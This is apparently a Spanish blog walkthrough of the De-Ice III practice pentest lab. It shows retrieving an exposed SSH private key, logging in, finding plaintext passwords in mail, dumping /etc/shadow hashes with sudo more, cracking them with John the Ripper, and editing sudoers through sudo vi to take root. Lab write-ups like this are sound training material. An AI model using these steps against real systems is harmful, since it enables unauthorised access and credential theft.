Sec-Track

Desarrollo del entorno De-Ice III – Acceso al Sistema y Elevación de Privilegios

Posted by S3cTr4ck On June - 1 - 2010

Continúa desde: Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades

Veamos ahora que podemos hacer con la información encontrada:

Index of /~pirrip//.ssh

Icon  Name                    Last modified      Size  Description

[DIR] Parent Directory                             -
[   ] id_rsa                  05-Jan-2008 20:29  1.6K
[   ] id_rsa.pub              05-Jan-2008 20:29  393
Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80

Esta información corresponde a la llave digital de acceso del usuario pirrip, muy posiblemente al realizarse la copia de seguridad previa a la migración del sistema, esta se olvidó en el antiguo server.

Descarguemos los archivos:

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
–2010-06-01 02:11:32–  http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
Connecting to 192.168.2.101:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 393 [text/plain]
Saving to: `id_rsa.pub’

100%[===========================================================>] 393         –.-K/s   in 0s

2010-06-01 02:11:32 (44.7 MB/s) – `id_rsa.pub’ saved [393/393]

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa
–2010-06-01 02:11:46–  http://192.168.2.101/~pirrip//.ssh/id_rsa
Connecting to 192.168.2.101:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1675 (1.6K) [text/plain]
Saving to: `id_rsa’

100%[===========================================================>] 1,675       –.-K/s   in 0s

2010-06-01 02:11:46 (172 MB/s) – `id_rsa’ saved [1675/1675]

root@Sec-Track:~/De-Ice2.100# ls
id_rsa  id_rsa.pub

Una vez descargadas las llaves, procedemos a copiarlas al directorio /foo/.ssh

root@Sec-Track:~/De-Ice2.100# cp id* /root/.ssh/

root@Sec-Track:~/.ssh# ls
id_rsa  id_rsa.pub  known_hosts

Confirmamos que la llave corresponde al usuario pirrip

root@Sec-Track:~/.ssh# more id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmm
tlA6iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNHCwPX0ADxDFyB
1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58nMq8DsGRbeC5hTdpLXKfBuW8v/lF
uNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1N
QRNplKSam3TIYI3+YwuhlcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5Q== pirrip@slax

Por lo tanto realicemos la conexión al sistema objetivo!!

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
The authenticity of host ’192.168.2.100 (192.168.2.100)’ can’t be established.
RSA key fingerprint is ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ’192.168.2.100′ (RSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for ‘/root/.ssh/id_rsa’ are too open.
It is recommended that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /root/.ssh/id_rsa
pirrip@192.168.2.100′s password:

Como vemos las llaves presentan un error de permisos… Por lo tanto cambiemos estos:

root@Sec-Track:~/.ssh# ls -la
total 20
drwx——  2 root root 4096 Jun  1 02:18 .
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..
-r–r–r– 1 root root 1675 Jun  1 02:17 id_rsa
-r–r–r– 1 root root  393 Jun  1 02:17 id_rsa.pub
-rw-r–r–  1 root root 1768 Jun  1 02:21 known_hosts
root@Sec-Track:~/.ssh# chmod 000 id*
root@Sec-Track:~/.ssh# ls -la
total 20
drwx——  2 root root 4096 Jun  1 02:18 .
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..
———- 1 root root 1675 Jun  1 02:17 id_rsa
———- 1 root root  393 Jun  1 02:17 id_rsa.pub
-rw-r–r–  1 root root 1768 Jun  1 02:21 known_hosts

Ahora si… Conectémonos al host

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$

Muy bien… Ya estamos dentro del sistema objetivo… Ahora como en  todos los Test de Penetración que hemos realizado, tratemos de escalar privilegios.

pirrip@slax:~$ cat /etc/passwd
root :x :0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
pirrip :x :1000:10 :P hilip Pirrip:/home/pirrip:/bin/bash
magwitch :x :1001:100:Abel Magwitch:/home/magwitch:/bin/bash
havisham :x :1002:100:Estella Havisham:/home/havisham:/bin/bash

Vemos como nuestro usuario pirrip tiene el ID 10… Comprobemos entonces los grupos.

pirrip@slax:/tmp$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:

Por lo tanto podremos utilizar el comando sudo

pirrip@slax:/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Lamentablemente desconocemos nuestro password.

Ahora observaremos en detalle la versión del sistema objetivo y trataremos identificar alguna vulnerabilidad reportada, ubicar algún exploit y ejecutarlo desde la carpeta /tmp

pirrip@slax:~$ uname -r
2.6.16
pirrip@slax:~$ cd /tmp/
You have mail in /var/mail/pirrip

Para nuestra sorpresa, cuando decidí cambiarme a la carpeta /tmp recibí el mensaje de que tengo un email … Veamos de que se trata

pirrip@slax:/tmp$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
“/var/mail/pirrip”: 7 messages 7 unread
>U  1 Abel Magwitch      Sun Jan 13 23:53   21/758   Estella
U  2 Estella Havisham   Sun Jan 13 23:53   21/790   welcome to the team
U  3 Abel Magwitch      Sun Jan 13 23:53   21/885   havisham
U  4 Estella Havisham   Mon Jan 14 00:05   21/871   next month
U  5 Abel Magwitch      Mon Jan 14 00:05   21/878   vacation
U  6 Abel Magwitch      Mon Jan 14 00:05   21/925   vacation
U  7 noreply@fermion.he Mon Jan 14 00:05   30/993   Fermion Account Login Reminder
? 1
Message  1:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Will do.

?
Message  2:
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Thanks!  Glad to be here.

?
Message  3:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

I set her up with an accountus servers.  I set her password to “changeme” and will swing by tomorrow and make sure she changes her pw.

?
Message  4:
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Mon, 14 Jan 2008 00:03:56 +0000
To: pirrip@slax.example.net
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.

?
Message  5:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:55:41 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Hey, I’ll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?

?
Message  6:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:58:28 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Sure – so far, she’s doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.

?
Message  7:
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.

Regards,
Fermion Support

E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

Vemos que interesante información nos encontramos en el email 7 y 3 … Nuestro password y el de havisham!!

Intentemos nuevamente listar el contenido de passwd

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Sorry, user pirrip is not allowed to execute ‘/usr/bin/cat /etc/shadow’ as root on slax.

Parece que no tenemos disponible el comando cat.. Comprobemos entonces que comandos interesantes y de utilidad tenemos…

pirrip@slax:/tmp$ sudo bash
Sorry, user pirrip is not allowed to execute ‘/usr/bin/bash’ as root on slax.
pirrip@slax:/tmp$ sudo sh
Sorry, user pirrip is not allowed to execute ‘/bin/sh’ as root on slax.
pirrip@slax:/tmp$ sudo ls
Sorry, user pirrip is not allowed to execute ‘/usr/bin/ls’ as root on slax.
pirrip@slax:/tmp$ sudo nano
sudo: nano: command not found
pirrip@slax:/tmp$ sudo more
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 …
pirrip@slax:/tmp$ sudo vi

Perfecto, a pesar de no tener disponibles la mayoría de comandos, si tenemos disponibles 2 muy importantes!!! more y vi . Veamos que podemos hacer con estos.

pirrip@slax:/tmp$ sudo more /etc/shadow
Password:
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

Genial… Llevemos estos resultados a la herramienta de password cracking John The Ripper.

root@Sec-Track:/pentest/passwords/jtr# ./john –user=root –w=/root/passwords/verycool.lst 100.txt
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:08:49 100.00% (ETA: Tue Jun  1 04:48:21 2010)  c/s: 4526  trying: aceguero

Lamentablemente no hemos dado con el password de root… Posiblemente sea un password complejo que no se encuentra incluido en nuestro diccionario.

Poniendo a prueba nuestra creatividad, veamos lo que podemos hacer con el comando vi sobre sudo.

pirrip@slax:/tmp$ sudo vi /etc/sudoers
Password:
reading /etc/sudoers

Allí modifico los permisos para nuestro usuario pirrip

# User privilege specification
root    ALL=(ALL) ALL
pirrip  ALL=(ALL) ALL

Ahora tenemos todos los permisos de sudo para ejecutar cualquier comando… Incluyendo el siguiente!!

pirrip@slax:/tmp$ sudo passwd root
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password: ***********
Re-enter new password: ***********
Password changed.

Ahora solo basta:

pirrip@slax:/tmp$ su
Password: ***********
root@slax:/tmp#

Para el próximo post veremos algunos otros métodos para comprometer este sistema…

Test de Penetración

One Response to “Desarrollo del entorno De-Ice III – Acceso al Sistema y Elevación de Privilegios”

  1. swordead says:
    %A %B %e%q, %Y at %I:%M %p

    Muy ingenioso te felicito

Leave a Reply